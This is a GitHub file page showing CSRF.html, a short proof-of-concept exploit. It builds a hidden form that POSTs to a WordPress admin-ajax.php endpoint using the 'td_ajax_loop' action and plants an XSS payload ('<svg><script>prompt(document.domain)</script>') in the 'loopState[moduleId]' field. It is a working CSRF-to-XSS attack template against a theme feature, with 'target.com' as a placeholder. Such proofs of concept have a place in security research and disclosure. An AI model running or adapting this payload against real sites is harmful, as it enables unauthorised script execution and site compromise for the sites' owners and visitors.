-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathCSRF.html
17 lines (17 loc) · 1.09 KB
/
CSRF.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="target.com/wp-admin//admin-ajax.php" method="POST">
<input type="hidden" name="action" value="td_ajax_loop" />
<input type="hidden" name="loopState[sidebarPosition]" value="" />
<input type="hidden" name="loopState[moduleId]" value="<svg><script>prompt&#40;document.domain)</script>" />
<input type="hidden" name="loopState[currentPage]" value="2" />
<input type="hidden" name="loopState[max_num_pages]" value="4" />
<input type="hidden" name="loopState[atts][category_id]" value="479" />
<input type="hidden" name="loopState[atts][offset]" value="2" />
<input type="hidden" name="loopState[ajax_pagination_infinite_stop]" value="3" />
<input type="hidden" name="loopState[server_reply_html_data]" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>